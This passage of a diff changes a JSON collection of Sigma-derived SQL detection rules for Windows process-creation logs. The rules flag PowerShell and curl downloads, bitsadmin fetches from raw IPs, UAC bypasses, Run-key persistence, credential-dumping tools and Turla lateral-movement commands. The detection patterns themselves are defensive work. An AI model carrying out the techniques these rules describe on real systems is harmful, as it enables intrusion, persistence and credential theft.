"author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND 
(CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "PowerShell Download Pattern", - "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "status": "test", - "description": "Detects a Powershell process that contains 
download commands in its command line string", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Use of UltraVNC Remote Access Software", + "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" ], - "filename": "proc_creation_win_powershell_download_patterns.yml" + "filename": "proc_creation_win_ultravnc.yml" }, { - "title": "Suspicious Execution of InstallUtil Without Log", - "id": "d042284c-a296-4988-9be5-f424fadcc28c", - "status": "test", - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", - "author": "frack113", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], 
"falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND NewProcessName LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_instalutil_no_log_execution.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of stordiag.exe." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Use of UltraVNC Remote Access Software", - "id": "145322e4-0fd3-486b-81ca-9addc75736d8", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "author": "frack113", + "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", + "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "status": "test", + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate use" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun 
keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ultravnc.yml" + "filename": "proc_creation_win_reg_add_run_key.yml" }, { - "title": "Automated Collection Command Prompt", - "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119", - "attack.credential_access", - "attack.t1552.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' 
ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_automated_collection.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "Use of TTDInject.exe", - "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", - "status": "experimental", - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "author": "frack113", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + 
"attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ttdinject.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Sdclt Child Processes", - "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", "status": "test", - "description": "A General detection for sdclt spawning new processes. 
This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdclt_child_process.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary DLL Load Using Winword", + "id": "f7375e28-5c14-432f-b8d1-1db26c832df3", + "status": "test", + "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName 
LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_office_winword_dll_load.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "MsiExec Web Install", + "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "status": "test", + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE 
'%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_msiexec_web_install.yml" }, { - "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", - "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", "status": "experimental", - "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", - "author": "@gott_cyber", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.defense_evasion", - "attack.t1218", "attack.t1105" ], "falsepositives": [ - "Since the content of the files are unknown, false positives are expected" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' 
OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ldifde_file_load.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Application Removed Via Wmic.EXE", - "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "title": "WSL Child Process Anomaly", + "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", "status": "experimental", - "description": "Uninstall an application with wmic", - "author": "frac113", + "description": "Detects uncommon or suspicious child processes spawning from a WSL process. 
This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_application.yml" + "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" }, { - "title": "Potential Network Sniffing Activity Using Network Tools", - "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "title": "IIS Native-Code Module Command Line Installation", + "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", "status": "test", - "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or 
wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious IIS native-code module installations via command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Legitimate administration activity to troubleshoot network issues" + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\windump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_network_sniffing.yml" + "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "Use of TTDInject.exe", + "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + 
"description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine 